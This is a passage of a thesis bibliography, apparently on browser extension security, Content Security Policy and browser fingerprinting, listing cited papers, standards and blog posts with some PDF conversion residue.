[169] Tom Anthony. Detect if visitors are logged into twitter, facebook or google+. http:

//www.tomanthony.co.uk/blog/detect-visitor-social-networks/, 2012.

[170] Sruthi Bandhakavi, Samuel T. King, P. Madhusudan, and Marianne Winslett. VEX:

vetting browser extensions for security vulnerabilities. In 19th USENIX Security

Symposium, Washington, DC, USA, August 11-13, 2010, Proceedings, pages 339–

354. USENIX Association, 2010.

[171] Rick Barrett, Rick Cummings, Eugene Agichtein, and Evgeniy Gabrilovich, editors.

Proceedings of the 26th International Conference on World Wide Web, WWW 2017,

Perth, Australia, April 3-7, 2017. ACM, 2017.

[172] Adam Barth, Adrienne Porter Felt, Prateek Saxena, and Aaron Boodman. Protecting

browsers from extension vulnerabilities. In Proceedings of the Network and Distributed

System Security Symposium, NDSS 2010, San Diego, California, USA, 28th February

- 3rd March 2010. The Internet Society, 2010.

[173] Károly Boda, Ádám Máté Földes, Gábor György Gulyás, and Sándor Imre. User

tracking on the web via cross-browser fingerprinting. In Proc. of the 16th NordSec,

pages 31–46, 2011.

[174] Eric Bodden, Mathias Payer, and Elias Athanasopoulos, editors. Engineering Secure

Software and Systems - 9th International Symposium, ESSoS 2017, Bonn, Germany,

July 3-5, 2017, Proceedings, volume 10379 of Lecture Notes in Computer Science.

Springer, 2017.

[175] Matthew Bryant. Dirty browser enumeration tricks - using chrome://

and about: to detect firefox and addons. https://thehackerblog.com/

dirty-browser-enumeration-tricks-using-chrome-and-about-to-detect-firefox-plugins/

index.html, 2014.

[176] Stefano Calzavara, Michele Bugliesi, Silvia Crafa, and Enrico Steffinlongo. Fine-

grained detection of privilege escalation attacks on browser extensions. In Jan Vitek,

editor, Programming Languages and Systems - 24th European Symposium on Pro-

gramming, ESOP 2015, Held as Part of the European Joint Conferences on Theory

and Practice of Software, ETAPS 2015, London, UK, April 11-18, 2015. Proceedings,

volume 9032 of Lecture Notes in Computer Science, pages 510–534. Springer, 2015.

[177] Stefano Calzavara, Alvise Rabitti, and Michele Bugliesi. Content Security Problems?:

Evaluating the Effectiveness of Content Security Policy in the Wild. In Weippl

et al. [268], pages 1365–1375.

[178] Stefano Calzavara, Alvise Rabitti, and Michele Bugliesi. CCSP: controlled relaxation

of content security policies by runtime policy composition. In Kirda and Ristenpart

[215], pages 695–712.

[179] Stefano Calzavara, Alvise Rabitti, and Michele Bugliesi. Semantics-based analysis

of content security policy deployment. ACM Trans. Web, 12(2):10:1–10:36, January

2017.

[180] Yinzhi Cao, Song Li, and Erik Wijmans. (cross-)browser fingerprinting via os and

hardware level features. In Proc. of the 24th NDSS, 2017.

PUT(0,-845.90042)

221

[181] Nicholas Carlini, Adrienne Porter Felt, and David A. Wagner. An evaluation of the

google chrome extension security architecture. In Tadayoshi Kohno, editor, Proceed-

ings of the 21th USENIX Security Symposium, Bellevue, WA, USA, August 8-10,

2012, pages 97–111. USENIX Association, 2012.

[182] Giovanni Cattani. The evolution of chrome extensions detection. http://blog.

beefproject.com/2013/04/the-evolution-of-chrome-extensions.html, 2013.

[183] Yves-Alexandre de Montjoye, César A. Hidalgo, Michel Verleysen, and Vincent D.

Blondel. Unique in the crowd: The privacy bounds of human mobility. Scientific

Reports, 3:1376 EP –, 2013.

[184] Adam Doupé, Weidong Cui, Mariusz H. Jakubowski, Marcus Peinado, Christopher

Kruegel, and Giovanni Vigna. deDacota: toward preventing server-side XSS via au-

tomatic code and data separation. In Ahmad-Reza Sadeghi, Virgil D. Gligor, and

Moti Yung, editors, 2013 ACM SIGSAC Conference on Computer and Communi-

cations Security, CCS’13, Berlin, Germany, November 4-8, 2013, pages 1205–1216.

ACM, 2013.

[185] Peter Eckersley. How Unique Is Your Web Browser? In Proc. of the 2010 PETS.

[186] Manuel Egele, Christopher Kruegel, Engin Kirda, Heng Yin, and Dawn Xiaodong

Song. Dynamic spyware analysis. In Proceedings of the 2007 USENIX Annual Tech-

nical Conference, Santa Clara, CA, USA, June 17-22, 2007, pages 233–246, 2007.

[187] Ahmed Elsobky. Novel techniques for user deanonymization attacks. https:

//0xsobky.github.io/novel-deanonymization-techniques/, 2016.

[188] Steven Englehardt and Arvind Narayanan. Online tracking: A 1-million-site mea-

surement and analysis. In Proc. of the 2016 CCS, pages 1388–1401, 2016.

[189] Steven Englehardt, Dillon Reisman, Christian Eubank, Peter Zimmerman, Jonathan

Mayer, Arvind Narayanan, and Edward W. Felten. Cookies that give you away: The

surveillance implications of web tracking. In Proc. of the 24th WWW, pages 289–299,

2015.

[190] H. Gamboa, A. L. N. Fred, and A. K. Jain. Webbiometrics: User verification via web

interaction. In 2007 Biometrics Symposium, pages 1–6, 2007.

[191] Alejandro Gómez-Boix, Pierre Laperdrix, and Benoit Baudry. Hiding in the crowd:

an analysis of the effectiveness of browser fingerprinting at large scale. In Pierre-

Antoine Champin, Fabien L. Gandon, Mounia Lalmas, and Panagiotis G. Ipeirotis,

editors, Proceedings of the 2018 World Wide Web Conference on World Wide Web,

WWW 2018, Lyon, France, April 23-27, 2018, pages 309–318. ACM, 2018.

[192] Willem De Groef. Client- and Server-Side Security Technologies for JavaScript Web

Applications ; Beveiligingstechnologiën voor webapplicaties in JavaScript. PhD thesis,

Katholieke Universiteit Leuven, Belgium, 2016.

[193] Jeremiah Grossman. I know what you’ve got (firefox extensions). http://blog.

jeremiahgrossman.com/2006/08/i-know-what-youve-got-firefox.html, 2006.

[194] Jeremiah Grossman. Login detection, whose problem is it? http://blog.

jeremiahgrossman.com/2008/03/login-detection-whose-problem-is-it.html,

2008.

[195] Arjun Guha, Matthew Fredrikson, Benjamin Livshits, and Nikhil Swamy. Verified

security for browser extensions. In 32nd IEEE Symposium on Security and Privacy,

S&P 2011, 22-25 May 2011, Berkeley, California, USA, pages 115–130. IEEE Com-

puter Society, 2011.

PUT(0,-845.90042)

222 BIBLIOGRAPHY

[196] Gábor György Gulyás, Gergely Acs, and Claude Castelluccia. Code repository for

paper titled ’near-optimal fingerprinting with constraints’. https://github.com/

gaborgulyas/constrainted_fingerprinting, 2016.

[197] Gábor György Gulyás, Gergely Acs, and Claude Castelluccia. Near-optimal fin-

gerprinting with constraints. Proceedings on Privacy Enhancing Technologies,

2016(4):470–487, 2016.

[198] Gábor György Gulyás, Dolière Francis Somé, Nataliia Bielova, and Claude Castellu-

cia. To extend or not to extend: on the uniqueness of browser extensions and web

logins. In To appear in the Proceedings of the 2018 ACM on Workshop on Privacy in

the Electronic Society, WPES@CCS 2018, Toronto, Canada, October 15 - 19, 2018,

2018.

[199] Jonas Haag. Modern and flexible browser fingerprinting library. https://github.

com/Valve/fingerprintjs2.

[200] Daniel Hausknecht, Jonas Magazinius, and Andrei Sabelfeld. May I? - Content Se-

curity Policy Endorsement for Browser Extensions. In Magnus Almgren, Vincenzo

Gulisano, and Federico Maggi, editors, Detection of Intrusions and Malware, and Vul-

nerability Assessment - 12th International Conference, DIMVA 2015, Milan, Italy,

July 9-10, 2015, Proceedings, volume 9148 of Lecture Notes in Computer Science,

pages 261–281. Springer, 2015.

[201] Brian Hayes. Uniquely me! how much information does it take to single out one

person among billions? 102:106–109, 2014.

[202] Stefan Heule, Devon Rifkin, Alejandro Russo, and Deian Stefan. The most dangerous

code in the browser. In George Candea, editor, 15th Workshop on Hot Topics in

Operating Systems, HotOS XV, Kartause Ittingen, Switzerland, May 18-20, 2015.

USENIX Association, 2015.

[203] Ian Hickson, Robin Berjon, Steve Faulkner, Travis Leithead, Erika Doyle Navara,

Edward O’Connor, and Silvia Pfeiffer. HTML5. A vocabulary and associated APIs

for HTML and XHTML. W3C Recommendation, 2014. https://www.w3.org/TR/

html5/embedded-content-0.html#an-iframe-srcdoc-document.

[204] Ariya Hidayat. ECMAScript Parsing Infrastructure. https://www.npmjs.com/

package/esprima.

[205] Ariya Hidayat. PhantomJS Headless Browser, 2010-2016. http://www.phantomjs.

org/.

[206] Egor Homakov. Using content-security-policy for evil. http://homakov.blogspot.

fr/2014/01/using-content-security-policy-for-evil.html, 2014.

[207] Egor Homakov. Profilejacking - legal tricks to detect user profile. https://sakurity.

com/blog/2015/03/10/Profilejacking.html, 2015.

[208] Collin Jackson and Adam Barth. Beware of Finer-Grained Origins. In Web 2.0

Security and Privacy (W2SP 2008), 2008.

[209] Ashar Javed. CSP Aider: An Automated Recommendation of Content Security

Policy for Web Applications. In IEEE Oakland Web 2.0 Security and Privacy

(W2SP’12), 2012.

[210] Simon Holm Jensen, Peter A. Jonsson, and Anders Møller. Remedying the eval

that men do. In Mats Per Erik Heimdahl and Zhendong Su, editors, International

Symposium on Software Testing and Analysis, ISSTA 2012, Minneapolis, MN, USA,

July 15-20, 2012, pages 34–44. ACM, 2012.

PUT(0,-845.90042)

223

[211] Martin Johns. Preparedjs: Secure script-templates for javascript. In Rieck et al. [241],

pages 102–121.

[212] Martin Johns. Script-templates for the content security policy. J. Inf. Sec. Appl.,

19(3):209–223, 2014.

[213] Alexandros Kapravelos, Chris Grier, Neha Chachra, Christopher Kruegel, Giovanni

Vigna, and Vern Paxson. Hulk: Eliciting malicious behavior in browser extensions.

In Kevin Fu and Jaeyeon Jung, editors, Proceedings of the 23rd USENIX Security

Symposium, San Diego, CA, USA, August 20-22, 2014., pages 641–654. USENIX

Association, 2014.

[214] Christoph Kerschbaumer, Sid Stamm, and Stefan Brunthaler. Injecting CSP for Fun

and Security. In Olivier Camp, Steven Furnell, and Paolo Mori, editors, Proceedings

of the 2nd International Conference on Information Systems Security and Privacy

(ICISSP 2016), Rome, Italy, February 19-21, 2016., pages 15–25. SciTePress, 2016.

[215] Engin Kirda and Thomas Ristenpart, editors. 26th USENIX Security Symposium,

USENIX Security 2017, Vancouver, BC, Canada, August 16-18, 2017. USENIX As-

sociation, 2017.

[216] Krzysztof Kotowitz. Intro to chrome addons hacking: fingerprinting. http://blog.

kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html, 2012.

[217] Balachander Krishnamurthy and Craig E. Wills. Privacy diffusion on the web: a

longitudinal perspective. In Proc. of the 18th WWW, pages 541–550, 2009.

[218] Pierre Laperdrix. Browser Fingerprinting: Exploring Device Diversity to Aug-

ment Authentication and Build Client-Side Countermeasures. (Empreinte digitale

d’appareil: exploration de la diversité des terminaux modernes pour renforcer

l’authentification en ligne et construire descontremesures côté client). PhD thesis,

INSA Rennes, France, 2017.

[219] Pierre Laperdrix, Benoit Baudry, and Vikas Mishra. Fprandom: Randomizing core

browser objects to break advanced device fingerprinting techniques. In Bodden et al.

[174], pages 97–114.

[220] Pierre Laperdrix, Walter Rudametkin, and Benoit Baudry. Mitigating browser fin-

gerprint tracking: Multi-level reconfiguration and diversification. In Paola Inverardi

and Bradley R. Schmerl, editors, 10th IEEE/ACM International Symposium on Soft-

ware Engineering for Adaptive and Self-Managing Systems, SEAMS 2015, Florence,

Italy, May 18-19, 2015, pages 98–108. IEEE Computer Society, 2015.

[221] Pierre Laperdrix, Walter Rudametkin, and Benoit Baudry. Beauty and the beast:

Diverting modern web browsers to build unique browser fingerprints. In IEEE Sym-

posium on Security and Privacy, SP 2016, San Jose, CA, USA, May 22-26, 2016,

pages 878–894. IEEE Computer Society, 2016.

[222] Adam Lerner, Anna Kornfeld Simpson, Tadayoshi Kohno, and Franziska Roesner.

Internet jones and the raiders of the lost trackers: An archaeological study of web

tracking from 1996 to 2016. In Proc. of the 25th USENIX Security, 2016.

[223] Robin Linus. Your social media fingerprint. https://robinlinus.github.io/

socialmedia-leak/, 2016.

[224] Mike Ter Louw, Jin Soon Lim, and V. N. Venkatakrishnan. Extensible web browser

security. In Bernhard M. Hämmerli and Robin Sommer, editors, Detection of In-

trusions and Malware, and Vulnerability Assessment, 4th International Conference,

DIMVA 2007, Lucerne, Switzerland, July 12-13, 2007, Proceedings, volume 4579 of

Lecture Notes in Computer Science, pages 1–19. Springer, 2007.

PUT(0,-845.90042)

224 BIBLIOGRAPHY

[225] Jonathan R. Mayer and John C. Mitchell. Third-party web tracking: Policy and

technology. In Proc. of the 2012 IEEE SP, pages 413–427, 2012.

[226] Georg Merzdovnik, Markus Huber, Damjan Buhov, Nick Nikiforakis, Sebastian Ne-

uner, Martin Schmiedecker, and Edgar Weippl. Block me if you can: A large-scale

study of tracker-blocking tools. In Proc. of the 2nd EuroSP, Paris, France, 2017.

[227] Keaton Mowery and Hovav Shacham. Pixel perfect: Fingerprinting canvas in

HTML5. In Matt Fredrikson, editor, Proceedings of W2SP 2012. IEEE Computer

Society, May 2012.

[228] Ben Newman. JavaScript Syntax Tree Transformer. https://www.npmjs.com/

package/recast.

[229] Nick Nikiforakis, Luca Invernizzi, Alexandros Kapravelos, Steven Van Acker, Wouter

Joosen, Christopher Kruegel, Frank Piessens, and Giovanni Vigna. You are what you

include: large-scale evaluation of remote javascript inclusions. In Proc. of the 2012

CCS, pages 736–747, 2012.

[230] Nick Nikiforakis, Alexandros Kapravelos, Wouter Joosen, Christopher Kruegel, Frank

Piessens, and Giovanni Vigna. Cookieless monster: Exploring the ecosystem of web-

based device fingerprinting. In 2013 IEEE Symposium on Security and Privacy, SP

2013, Berkeley, CA, USA, May 19-22, 2013, pages 541–555. IEEE Computer Society,

2013.

[231] Łukasz Olejnik, Claude Castelluccia, and Artur Janc. Why johnny can’t browse in

peace: On the uniqueness of web browsing history patterns. In Hot Topics in Privacy

Enhancing Technologies (HotPETs 2012), 07 2012.

[232] Kaan Onarlioglu, Mustafa Battal, William K. Robertson, and Engin Kirda. Securing

legacy firefox extensions with SENTINEL. In Rieck et al. [241], pages 122–138.

[233] Kaan Onarlioglu, Ahmet Salih Buyukkayhan, William K. Robertson, and Engin

Kirda. SENTINEL: securing legacy firefox extensions. Computers & Security, 49:147–

161, 2015.

[234] Xiang Pan, Yinzhi Cao, and Yan Chen. I do not know what you visited last summer:

Protecting users from stateful third-party web tracking with trackingfree browser. In

Proc. of the 22nd NDSS, 2015.

[235] Xiang Pan, Yinzhi Cao, Shuangping Liu, Yu Zhou, Yan Chen, and Tingzhe Zhou.

CSPAutoGen: Black-box Enforcement of Content Security Policy upon Real-world

Websites. In Weippl et al. [268], pages 653–665.

[236] Kailas Patil and Braun Frederik. A Measurement Study of the Content Security

Policy on Real-World Applications. I. J. Network Security, 18(2):383–392, 2016.

[237] Ian Paul. Firefox will stop supporting plugins by end of 2016, follow-

ing chrome’s lead. https://www.pcworld.com/article/2990991/browsers/

firefox-will-stop-supporting-npapi-plugins-by-end-of-2016-following-chromes-lead.

html.

[238] Nicolas Perriault. CasperJS navigation and scripting tool for PhantomJS, 2011-2016.

http://www.casperjs.org/.

[239] M. Pusara and C. Brodley. User re-authentication via mouse movements. In ACM

Workshop Visualizat. Data Mining Comput. Security, page 1–8, 2004.

[240] Gregor Richards, Christian Hammer, Brian Burg, and Jan Vitek. The eval that

men do - A large-scale study of the use of eval in javascript applications. In Mira

PUT(0,-845.90042)

225

Mezini, editor, ECOOP 2011 - Object-Oriented Programming - 25th European Con-

ference, Lancaster, UK, July 25-29, 2011 Proceedings, volume 6813 of Lecture Notes

in Computer Science, pages 52–78. Springer, 2011.

[241] Konrad Rieck, Patrick Stewin, and Jean-Pierre Seifert, editors. Detection of Intru-

sions and Malware, and Vulnerability Assessment - 10th International Conference,

DIMVA 2013, Berlin, Germany, July 18-19, 2013. Proceedings, volume 7967 of Lec-

ture Notes in Computer Science. Springer, 2013.

[242] Franziska Roesner, Tadayoshi Kohno, and David Wetherall. Detecting and defending

against third-party tracking on the web. In Proc. of the 9th NSDI, pages 155–168,

2012.

[243] Joseph Roth, Xiaoming Liu, and Dimitris Metaxas. On continuous user authentica-

tion via typing behavior. 23(10):4611–4624, 2014.

[244] Gustav Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson. Busting frame

busting: a study of clickjacking vulnerabilities at popular sites. In in IEEE Oakland

Web 2.0 Security and Privacy (W2SP 2010), 2010.

[245] Iskander Sánchez-Rola, Igor Santos, and Davide Balzarotti. Extension breakdown:

Security analysis of browsers extension resources control policies. In Kirda and Ris-

tenpart [215], pages 679–694.

[246] Justin Schuh. Canvas DefendeSaying Goodbye to Our Old Friend

NPAPI, September 2013. https://blog.chromium.org/2013/09/

saying-goodbye-to-our-old-friend-npapi.html.

[247] Manuel Serrano. Hop.js - Multi-tier JavaScript. http://hop.inria.fr/home/index.

html.

[248] Kapil Singh, Alexander Moshchuk, Helen J. Wang, and Wenke Lee. On the In-

coherencies in Web Browser Access Control Policies. In 31st IEEE Symposium on

Security and Privacy, S&P 2010, 16-19 May 2010, Berleley/Oakland, California,

USA, pages 463–478, 2010.

[249] Alexander Sjösten, Steven Van Acker, and Andrei Sabelfeld. Discovering browser

extensions via web accessible resources. In Gail-Joon Ahn, Alexander Pretschner,

and Gabriel Ghinita, editors, Proceedings of the Seventh ACM on Conference on

Data and Application Security and Privacy, CODASPY 2017, Scottsdale, AZ, USA,

March 22-24, 2017, pages 329–336. ACM, 2017.

[250] Ashkan Soltani, Shannon Canty, Quentin Mayo, Lauren Thomas, and Chris Jay

Hoofnagle. Flash Cookies and Privacy. In AAAI spring symposium: intelligent

information privacy management, pages 158–163, 2010.

[251] Dolière Francis Somé. Breaking the Same Origin Policy for free - On CORS headers

manipulations by browser extensions. Submitted for review.

[252] Dolière Francis Somé. EmPoWeb: Empowering web applications with browser ex-

tensions. Submitted for review.

[253] Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. On the Content Security

Policy violations due to the Same-Origin Policy. Technical report. http://www-sop.

inria.fr/members/Nataliia.Bielova/papers/CSP-SOP.pdf.

[254] Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. Control what you include!

- server-side protection against third party web tracking. In Bodden et al. [174], pages

115–132.

PUT(0,-845.90042)

226 BIBLIOGRAPHY

[255] Dolière Francis Somé, Nataliia Bielova, and Tamara Rezk. On the content security

policy violations due to the same-origin policy. In Barrett et al. [171], pages 877–886.

[256] Dolière Francis Somé and Tamara Rezk. DF-CSP: Dependency-Free Content Security

Policy. Submitted for review.

[257] Dolière Francis Somé and Tamara Rezk. Extending Content Security Policy: Black-

listing, URL arguments filtering and Monitoring. Submitted for review.

[258] Sid Stamm, Brandon Sterne, and Gervase Markham. Reining in the web with con-

tent security policy. In Michael Rappa, Paul Jones, Juliana Freire, and Soumen

Chakrabarti, editors, Proceedings of the 19th International Conference on World

Wide Web, WWW 2010, Raleigh, North Carolina, USA, April 26-30, 2010, pages

921–930. ACM, 2010.

[259] Oleksii Starov and Nick Nikiforakis. Extended tracking powers: Measuring the pri-

vacy diffusion enabled by browser extensions. In Barrett et al. [171], pages 1481–1490.

[260] Oleksii Starov and Nick Nikiforakis. XHOUND: quantifying the fingerprintability of

browser extensions. In 2017 IEEE Symposium on Security and Privacy, SP 2017,

San Jose, CA, USA, May 22-26, 2017, pages 941–956. IEEE Computer Society, 2017.

[261] Brandon Sterne and Adam Barth. Content Security Policy 1.0. W3C Candidate

Recommendation, 2012. http://www.w3.org/TR/2012/CR-CSP-20121115/.

[262] Nikhil Swamy, Cédric Fournet, Aseem Rastogi, Karthikeyan Bhargavan, Juan Chen,

Pierre-Yves Strub, and Gavin M. Bierman. Gradual typing embedded securely in

JavaScript. In Suresh Jagannathan and Peter Sewell, editors, The 41st Annual ACM

SIGPLAN-SIGACT Symposium on Principles of Programming Languages, POPL

’14, San Diego, CA, USA, January 20-21, 2014, pages 425–438. ACM, 2014.

[263] Naoki Takei, Takamichi Saito, Ko Takasu, and Tomotaka Yamada. Web browser

fingerprinting using only cascading style sheets. In Proc. of the 10th BWCCA, pages

57–63, 2015.

[264] Randika Upathilake, Yingkun Li, and Ashraf Matrawy. A classification of web

browser fingerprinting techniques. In Proc. of the 7th NTMS, pages 1–5, 2015.

[265] Anne van Kesteren. Cross Origin Resource Sharing. W3C Recommendation, 2014.

https://www.w3.org/TR/cors/.

[266] Antoine Vastel, Pierre Laperdrix, Walter Rudametkin, and Romain Rouvoy. FP-

STALKER: tracking browser fingerprint evolutions. In 2018 IEEE Symposium on

Security and Privacy, SP 2018, Proceedings, 21-23 May 2018, San Francisco, Cali-

fornia, USA, pages 728–741. IEEE, 2018.

[267] Lukas Weichselbaum, Michele Spagnuolo, Sebastian Lekies, and Artur Janc. CSP Is

Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content

Security Policy. In Weippl et al. [268], pages 1376–1387.

[268] Edgar R. Weippl, Stefan Katzenbeisser, Christopher Kruegel, Andrew C. Myers, and

Shai Halevi, editors. Proceedings of the 2016 ACM SIGSAC Conference on Computer

and Communications Security, Vienna, Austria, October 24-28, 2016. ACM, 2016.

[269] Michael Weissbacher, Tobias Lauinger, and William K. Robertson. Why Is CSP

Failing? Trends and Challenges in CSP Adoption. In Research in Attacks, Intrusions

and Defenses - 17th International Symposium, RAID 2014, Gothenburg, Sweden,

September 17-19, 2014. Proceedings, pages 212–233, 2014.

[270] Michael Weissbacher, Enrico Mariconti, Guillermo Suarez-Tangil, Gianluca Stringh-

ini, William K. Robertson, and Engin Kirda. Ex-ray: Detection of history-leaking

PUT(0,-845.90042)

227

browser extensions. In Proceedings of the 33rd Annual Computer Security Applica-

tions Conference, Orlando, FL, USA, December 4-8, 2017, pages 590–602. ACM,

2017.

[271] Mike West. Content Security Policy: Embedded Enforcement, 2016. https://w3c.

github.io/webappsec-csp/embedded/.

[272] Mike West. Content Security Policy Level 3. W3C Working Draft, 2016. http:

//www.w3.org/TR/CSP3/.

[273] Mike West. Mixed Content, 2016. https://www.w3.org/TR/mixed-content/.

[274] Mike West. Origin Policy. A Collection of Interesting Ideas, 2016. https://wicg.

github.io/origin-policy/.

[275] Mike West, Adam Barth, and Dan Veditz. Content Security Policy Level 2. W3C

Candidate Recommendation, 2015. http://www.w3.org/TR/CSP2/.

[276] Mike West and Ilya Grigorik. Feature Policy. W3C Draft Community Group Report,

2016. https://wicg.github.io/feature-policy/.

[277] Rob Wu. CRX Extension Source Viewer For Chrome, Opera, and Firefox. https:

//robwu.nl/crxviewer/.

[278] Imran Yusof and Al-Sakib Khan Pathan. Mitigating Cross-Site Scripting Attacks

with a Content Security Policy. IEEE Computer, 49(3):56–63, 2016.

[279] Yu Zhong, Yunbin Deng, and Anil K. Jain. Keystroke dynamics for user authentica-

tion. In 2012 IEEE Computer Society Conference on Computer Vision and Pattern

Recognition Workshops, Providence, RI, USA, June 16-21, 2012, pages 117–123,

2012.

PUT(0,-845.90042)